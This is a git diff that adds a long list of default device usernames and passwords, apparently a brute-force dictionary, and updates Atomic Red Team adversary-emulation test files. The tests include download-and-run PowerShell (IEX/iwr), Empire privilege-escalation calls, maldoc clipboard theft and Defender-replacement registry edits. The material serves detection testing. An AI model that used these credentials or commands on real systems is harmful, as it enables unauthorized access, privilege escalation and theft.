+admin:Ascend
+admin:BRIDGE
+admin:Intel
+admin:MiniAP
+admin:NetCache
+admin:NetICs
+admin:OCS
+admin:P@55w0rd!
+admin:PASSWORD
+admin:Protector
+admin:SMDR
+admin:SUPER
+admin:Symbol
+admin:TANDBERG
+admin:_Cisco
+admin:access
+admin:admin
+admin:admin117.35.97.74
+admin:admin123
+admin:admin1234
+admin:administrator
+admin:adminttd
+admin:adslolitec
+admin:adslroot
+admin:adtran
+admin:articon
+admin:asante
+admin:ascend
+admin:asd
+admin:atc123
+admin:atlantis
+admin:backdoor
+admin:barricade
+admin:barricadei
+admin:bintec
+admin:cableroot
+admin:changeme
+admin:cisco
+admin:comcomcom
+admin:conexant
+admin:default
+admin:diamond
+admin:enter
+admin:epicrouter
+admin:extendnet
+admin:fliradmin
+admin:giraff
+admin:hagpolm1
+admin:hello
+admin:help
+admin:hp.com
+admin:ironport
+admin:isee
+admin:jvc
+admin:kont2004
+admin:letmein
+admin:leviton
+admin:linga
+admin:meinsma
+admin:michaelangelo
+admin:michelangelo
+admin:microbusiness
+admin:motorola
+admin:mu
+admin:my_DEMARC
+admin:netadmin
+admin:noway
+admin:oelinux123
+admin:operator
+admin:p-assword
+admin:pass
+admin:password
+admin:passwort
+admin:pento
+admin:pfsense
+admin:private
+admin:public
+admin:pwp
+admin:radius
+admin:rmnetlm
+admin:root
+admin:secure
+admin:service
+admin:setup
+admin:sitecom
+admin:smallbusiness
+admin:smcadmin
+admin:speedxess
+admin:superuser
+admin:support
+admin:switch
+admin:synnet
+admin:sysAdmin
+admin:system
+admin:tech
+admin:ubnt
+admin:visual
+admin:w2402
+admin:wbox
+admin:xad$l#12
+admin:xad$|#12
+admin:zoomadsl
+admin2:changeme
+administrator:administrator
+administrator:changeme
+adminstat:OCS
+adminstrator:changeme
+adminttd:adminttd
+adminuser:OCS
+adminview:OCS
+alpine:alpine
+anonymous:Exabyte
+anonymous:any@
+apc:apc
+at4400:at4400
+bbsd-client:NULL
+bbsd-client:changeme2
+bciim:bciimpw
+bcim:bcimpw
+bcms:bcmspw
+bcnas:bcnaspw
+bcnas:pcnaspw
+blue:bluepw
+browse:browsepw
+browse:looker
+cablecom:router
+cablemodem:robotics
+cac_admin:cacadmin
+cas:cascade
+ccrusr:ccrusr
+cellit:cellit
+cgadmin:cgadmin
+cisco:cisco
+citel:citel
+client:client
+cmaker:cmaker
+comcast:1234
+corecess:corecess
+craft:craft
+craft:craftpw
+craft:crftpw
+cusadmin:highspeed
+cust:custpw
+customer:none
+dadmin:dadmin01
+davox:davox
+debug:d.e.b.u.g
+debug:synnet
+default:antslq
+default:default
+default:password
+deskalt:password
+deskman:changeme
+desknorm:password
+deskres:password
+device:device
+dhs3mt:dhs3mt
+dhs3pms:dhs3pms
+diag:danger
+diag:switch
+disttech:4tas
+draytek:1234
+e250:e250changeme
+e500:e500changeme
+echo:User
+echo:echo
+eng:engineer
+enquiry:enquirypw
+field:support
+guest:1111
+guest:12345
+guest:123456
+guest:User
+guest:guest
+guest:xc3511
+halt:tlah
+helpdesk:OCS
+hsa:hsadb
+hscroot:abc123
+iclock:timely
+images:images
+inads:inads
+inads:indspw
+init:initpw
+install:llatsni
+install:secret
+installer:installer
+intel:intel
+intermec:intermec
+intermec:intermec1QTPS
+kermit:kermit
+l2:l2
+l3:l3
+locate:locatepw
+login:0
+login:1111
+login:8429
+login:access
+login:admin
+login:password
+lp:lp
+m1122:m1122
+maint:maint
+maint:maintpw
+maint:ntacdmax
+maint:rwmaint
+manage:!manage
+manager:admin
+manager:change_on_install
+manager:friend
+manager:manager
+manager:sys
+manuf:xxyyzz
+mediator:mediator
+mg3500:merlin
+mlusr:mlusr
+monitor:monitor
+mother:fucker
+mtch:mtch
+mtcl:mtcl
+naadmin:naadmin
+netangr:attack
+netman:netman
+netopia:netopia
+netrangr:attack
+netscreen:netscreen
+nms:nmspw
+nokai:nokai
+nokia:nokia
+none:0
+none:admin
+op:op
+op:operator
+operator:$chwarzepumpe
+operator:1234
+operator:operator
+oracle:oracle
+patrol:patrol
+piranha:piranha
+piranha:q
+poll:tech
+public:public
+radware:radware
+rapport:r@p8p0r+
+rcust:rcustpw
+readonly:lucenttech2
+readwrite:lucenttech1
+recovery:recovery
+replicator:replicator
+ro:ro
+root:000000
+root:1111
+root:1234
+root:12345
+root:123456
+root:1234567890
+root:1234qwer
+root:123qwe
+root:1q2w3e4r5
+root:3ep5w2u
+root:54321
+root:666666
+root:7ujMko0admin
+root:7ujMko0vizxv
+root:888888
+root:Admin
+root:Cisco
+root:GMB182
+root:LSiuY7pOmZG2s
+root:Mau'dib
+root:PASSWORD
+root:ROOT500
+root:Serv4EMC
+root:Zte521
+root:abc123
+root:admin
+root:admin1234
+root:admin_1
+root:ahetzip8
+root:alpine
+root:anko
+root:antslq
+root:ascend
+root:attack
+root:avtech
+root:b120root
+root:bananapi
+root:blender
+root:calvin
+root:changeme
+root:cms500
+root:comcom
+root:coolphoenix579
+root:davox
+root:default
+root:dreambox
+root:fivranne
+root:ggdaseuaimhrke
+root:hi3518
+root:iDirect
+root:ikwb
+root:ikwd
+root:jauntech
+root:juantech
+root:jvbzd
+root:klv123
+root:klv1234
+root:letacla
+root:maxided
+root:oelinux123
+root:openssh
+root:openvpnas
+root:orion99
+root:pa55w0rd
+root:pass
+root:password
+root:permit
+root:realtek
+root:root
+root:tini
+root:tslinux
+root:ubnt
+root:user
+root:vizxv
+root:wyse
+root:xc3511
+root:xmhdipc
+root:zlxx.
+root:zte9x15
+router:router
+rw:rw
+rwa:rwa
+scmadmin:scmchangeme
+scout:scout
+secret:secret
+secure:secure
+security:security
+service:smile
+setup:changeme
+setup:changeme!
+setup:setup
+smc:smcadmin
+spcl:0
+storwatch:specialist
+stratacom:stratauser
+su:super
+super:5777364
+super:super
+super:surt
+super.super:master
+superadmin:secret
+superman:21241036
+superman:talent
+superuser:123456
+superuser:admin
+supervisor:PlsChgMe!
+supervisor:PlsChgMe1
+supervisor:supervisor
+supervisor:zyad1234
+support:123
+support:1234
+support:12345
+support:123456
+support:admin
+support:h179350
+support:login
+support:support
+support:supportpw
+support:zlxx.
+sys:uplink
+sysadm:Admin
+sysadm:PASS
+sysadm:anicust
+sysadm:sysadm
+sysadmin:PASS
+sysadmin:password
+sysadmin:sysadmin
+system:change_on_install
+system:password
+system:sys
+system/manager:sys/change_on_install
+target:password
+teacher:password
+tech:ANYCOM
+tech:ILMI
+tech:field
+tech:tech
+telco:telco
+telecom:telecom
+tellabs:tellabs#1
+telnet:telnet
+temp1:password
+test:test
+tiara:tiaranet
+tiger:tiger123
+topicalt:password
+topicnorm:password
+topicres:password
+ubnt:ubnt
+user:123456
+user:pass
+user:password
+user:public
+user:tivonpw
+user:user
+vcr:NetVCR
+volition:volition
+vt100:public
+webadmin:1234
+webadmin:webadmin
+websecadm:changeme
+wlse:wlsedb
+wradmin:trancell
+write:private
+xd:xd
+xxx:cascade
+zyfwp:PrOw!aN_fXp
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 186c2deb..1214c378 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -32,6 +32,10 @@ will be displayed. Additionally, open Registry Editor to view the new entry in H
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
+
+
+
 
 
 
@@ -62,10 +66,14 @@ will be displayed. Additionally, open Registry Editor to view the modified entry
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 282f929a-6bc5-42b8-bd93-960c3ba35afe
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe|
 
@@ -97,6 +105,10 @@ Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\Cur
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
+
+
+
 
 
 
@@ -129,10 +141,14 @@ https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterpris
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cf447677-5a4e-4937-a82c-e47d254afd57
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bad_domain | Domain to add to trusted site zone | String | bad-domain.com|
 
@@ -169,6 +185,10 @@ Additionally, open Registry Editor to view the modified entry in HKCU:\Software\
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 15f44ea9-4571-4837-be9e-802431a7bfae
+
+
+
 
 
 
@@ -198,10 +218,14 @@ They can either specify it during the execution of the powershell script or chan
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f3a6cceb-06c9-48e5-8df8-8867a6814245
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | default_execution_policy | Specify the default poweshell execution policy | String | Default|
 
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md
index 20adce62..fc466d2d 100644
--- a/atomics/T1113/T1113.md
+++ b/atomics/T1113/T1113.md
@@ -24,10 +24,14 @@ Use screencapture command to collect a full desktop screenshot
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 0f47ceb1-720f-4275-96b8-21f0562217ac
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output file path | Path | /tmp/T1113_desktop.png|
 
@@ -57,10 +61,14 @@ Use screencapture command to collect a full desktop screenshot
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output file path | Path | /tmp/T1113_desktop.png|
 
@@ -90,10 +98,14 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output file path | Path | /tmp/T1113_desktop.xwd|
 | package_checker | Package checking command for linux. Debian system command- dpkg -s x11-apps | string | rpm -q xorg-x11-apps|
@@ -119,7 +131,7 @@ rm #{output_file}
 ##### Description: Package with XWD and XWUD must exist on device
 ##### Check Prereq Commands:
 ```bash
-if #{package_checker} > /dev/null; then exit 0; else exit 1; fi 
+if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -138,10 +150,14 @@ Use import command from ImageMagick to collect a full desktop screenshot
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 9cd1cccb-91e4-4550-9139-e20a586fcea1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output file path | Path | /tmp/T1113_desktop.png|
 
@@ -164,7 +180,7 @@ rm #{output_file}
 ##### Description: ImageMagick must be installed
 ##### Check Prereq Commands:
 ```bash
-if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi 
+if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -183,10 +199,14 @@ Use Psr.exe binary to collect screenshots of user display. Test will do left mou
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3c898f62-626c-47d5-aad2-6de873d69153
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output file path | Path | c:&#92;temp&#92;T1113_desktop.zip|
 | recording_time | Time to take screenshots | String | 5|
diff --git a/atomics/T1114.001/T1114.001.md b/atomics/T1114.001/T1114.001.md
index 6e5aa9a7..e641d3bc 100644
--- a/atomics/T1114.001/T1114.001.md
+++ b/atomics/T1114.001/T1114.001.md
@@ -20,10 +20,14 @@ Note: Outlook is required, but no email account necessary to produce artifacts.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3f1b5096-0139-4736-9b78-19bcb02bb1cb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output file path | String | $env:TEMP&#92;mail.csv|
 | file_path | File path for Get-Inbox.ps1 | String | PathToAtomicsFolder&#92;T1114.001&#92;src|
@@ -47,7 +51,7 @@ Remove-Item #{output_file} -Force -ErrorAction Ignore
 ##### Description: Get-Inbox.ps1 must be located at #{file_path}
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md
index c85e124d..1d206989 100644
--- a/atomics/T1115/T1115.md
+++ b/atomics/T1115/T1115.md
@@ -23,6 +23,10 @@ Add data to clipboard to copy off or execute commands from.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0cd14633-58d4-4422-9ede-daa2c9474ae7
+
+
+
 
 
 
@@ -53,6 +57,10 @@ Utilize PowerShell to echo a command to clipboard and execute it
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d6dc21af-bec9-4152-be86-326b6babd416
+
+
+
 
 
 
@@ -78,6 +86,10 @@ Echo a command to clipboard and execute it
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
+
+
+
 
 
 
@@ -103,10 +115,14 @@ This module copies the data stored in the user's clipboard and writes it to a fi
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|
 
@@ -115,8 +131,9 @@ This module copies the data stored in the user's clipboard and writes it to a fi
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
 ```
 
@@ -136,7 +153,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml
index d31d6b2a..12bcbf94 100644
--- a/atomics/T1115/T1115.yaml
+++ b/atomics/T1115/T1115.yaml
@@ -62,8 +62,9 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
     cleanup_command: |
       Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md
index ac5f303f..f85f5632 100644
--- a/atomics/T1119/T1119.md
+++ b/atomics/T1119/T1119.md
@@ -24,6 +24,10 @@ to see what was collected.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cb379146-53f1-43e0-b884-7ce2c635ff5b
+
+
+
 
 
 
@@ -55,6 +59,10 @@ to see what was collected.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 634bd9b9-dc83-4229-b19f-7f83ba9ad313
+
+
+
 
 
 
@@ -85,6 +93,10 @@ to see what was collected.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c3f6d794-50dd-482f-b640-0384fbb7db26
+
+
+
 
 
 
@@ -118,6 +130,10 @@ to see what was collected.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** aa1180e2-f329-4e1e-8625-2472ec0bfaf3
+
+
+
 
 
 
diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md
index 4a4a879a..18669e5e 100644
--- a/atomics/T1120/T1120.md
+++ b/atomics/T1120/T1120.md
@@ -15,6 +15,10 @@ Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2cb4dbf2-2dca-4597-8678-4d39d207a3a5
+
+
+
 
 
 
diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md
index 89a3dc0d..4c71401f 100644
--- a/atomics/T1123/T1123.md
+++ b/atomics/T1123/T1123.md
@@ -17,6 +17,10 @@ Malware or scripts may be used to interact with the devices through an available
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9c3ad250-b185-4444-b5a9-d69218a10c95
+
+
+
 
 
 
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md
index f9a8e3d2..6c47ab1a 100644
--- a/atomics/T1124/T1124.md
+++ b/atomics/T1124/T1124.md
@@ -21,10 +21,14 @@ Identify the system time. Upon execution, the local computer system time and tim
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 20aba24b-e61f-4b26-b4ce-4784f763ca20
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | computer name to query | string | localhost|
 
@@ -51,6 +55,10 @@ Identify the system time via PowerShell. Upon execution, the system time will be
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1d5711d6-655c-4a47-ae9c-6503c74fa877
+
+
+
 
 
 
diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md
index 26dad271..5175ec9f 100644
--- a/atomics/T1127.001/T1127.001.md
+++ b/atomics/T1127.001/T1127.001.md
@@ -19,10 +19,14 @@ Executes the code in a project file using msbuild.exe. The default C# project ex
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 58742c0f-cb01-44cd-a60b-fb26e8871c93
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | filename | Location of the project file | Path | PathToAtomicsFolder&#92;T1127.001&#92;src&#92;T1127.001.csproj|
 | msbuildpath | Default location of MSBuild | Path | C:&#92;Windows&#92;Microsoft.NET&#92;Framework&#92;v4.0.30319|
@@ -43,7 +47,7 @@ Executes the code in a project file using msbuild.exe. The default C# project ex
 ##### Description: Project file must exist on disk at specified location (#{filename})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{filename}) {exit 0} else {exit 1} 
+if (Test-Path #{filename}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -63,10 +67,14 @@ Executes the code in a project file using msbuild.exe. The default Visual Basic
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ab042179-c0c5-402f-9bc8-42741f5ce359
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | filename | Location of the project file | Path | PathToAtomicsFolder&#92;T1127.001&#92;src&#92;vb.xml|
 | msbuildpath | Default location of MSBuild | Path | C:&#92;Windows&#92;Microsoft.NET&#92;Framework&#92;v4.0.30319|
@@ -87,7 +95,7 @@ Executes the code in a project file using msbuild.exe. The default Visual Basic
 ##### Description: Project file must exist on disk at specified location (#{filename})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{filename}) {exit 0} else {exit 1} 
+if (Test-Path #{filename}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1132.001/T1132.001.md b/atomics/T1132.001/T1132.001.md
index 0fcad8c1..f3c396c8 100644
--- a/atomics/T1132.001/T1132.001.md
+++ b/atomics/T1132.001/T1132.001.md
@@ -15,10 +15,14 @@ Utilizing a common technique for posting base64 encoded data.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | destination_url | Destination URL to post encoded data. | string | redcanary.com|
 | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md
index 5a22a3b7..24b4ad2b 100644
--- a/atomics/T1133/T1133.md
+++ b/atomics/T1133/T1133.md
@@ -19,10 +19,14 @@ Running Chrome VPN Extensions via the Registry install 2 vpn extension, please s
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4c8db261-a58b-42a6-a866-0a294deedde4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | chrome_url | chrome installer download URL | url | https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe|
 | extension_id | chrome extension id | String | "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"|
@@ -54,7 +58,7 @@ Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extensio
 ##### Description: Chrome must be installed
 ##### Check Prereq Commands:
 ```powershell
-if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} 
+if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md
index 05f6a2a7..958ceb8c 100644
--- a/atomics/T1134.001/T1134.001.md
+++ b/atomics/T1134.001/T1134.001.md
@@ -22,6 +22,10 @@ Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-get
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 90db9e27-8e7c-4c04-b602-a45927884966
+
+
+
 
 
 
@@ -29,6 +33,7 @@ Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-get
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
 ```
 
@@ -47,6 +52,10 @@ When executed successfully, the test displays the domain and name of the account
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 34f0a430-9d04-4d98-bcb5-1989f14719f0
+
+
+
 
 
 
@@ -54,6 +63,7 @@ When executed successfully, the test displays the domain and name of the account
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
 ```
 
diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml
index 13b5dba6..2d0248d3 100644
--- a/atomics/T1134.001/T1134.001.yaml
+++ b/atomics/T1134.001/T1134.001.yaml
@@ -11,7 +11,9 @@ atomic_tests:
   supported_platforms:
   - windows
   executor:
-    command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
     name: powershell
     elevation_required: true
 - name: '`SeDebugPrivilege` token duplication'
@@ -22,6 +24,8 @@ atomic_tests:
   supported_platforms:
   - windows
   executor:
-    command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
     name: powershell
     elevation_required: true
diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md
index 56fae58f..c2fa3995 100644
--- a/atomics/T1134.004/T1134.004.md
+++ b/atomics/T1134.004/T1134.004.md
@@ -31,10 +31,14 @@ Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 069258f4-2162-46e9-9a25-c9c6c56150d2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | parent_process_name | Name of the parent process | string | explorer|
 | spawnto_process_path | Path of the process to spawn | path | C:&#92;Program Files&#92;Internet Explorer&#92;iexplore.exe|
@@ -64,7 +68,7 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
 ##### Description: DLL to inject must exist on disk at specified location (#{dll_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_path}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -84,10 +88,14 @@ Spawns a powershell.exe process as a child of the current process.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 14920ebd-1d61-491a-85e0-fe98efe37f25
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | File path or name of process to spawn | path | $Env:windir&#92;System32&#92;WindowsPowerShell&#92;v1.0&#92;powershell.exe|
 | parent_pid | PID of process to spawn from | string | $PID|
@@ -110,7 +118,7 @@ Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{comma
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -129,10 +137,14 @@ Spawns a notepad.exe process as a child of the current process.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cbbff285-9051-444a-9d17-c07cd2d230eb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | parent_pid | PID of process to spawn from | string | $PID|
 | test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123|
@@ -154,7 +166,7 @@ Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid #{test_gu
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -173,10 +185,14 @@ Spawnd a process as a child of the first accessible svchost.exe process.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e9f2b777-3123-430b-805d-5cedc66ab591
+
+
+
 
 
 #### Inputs:
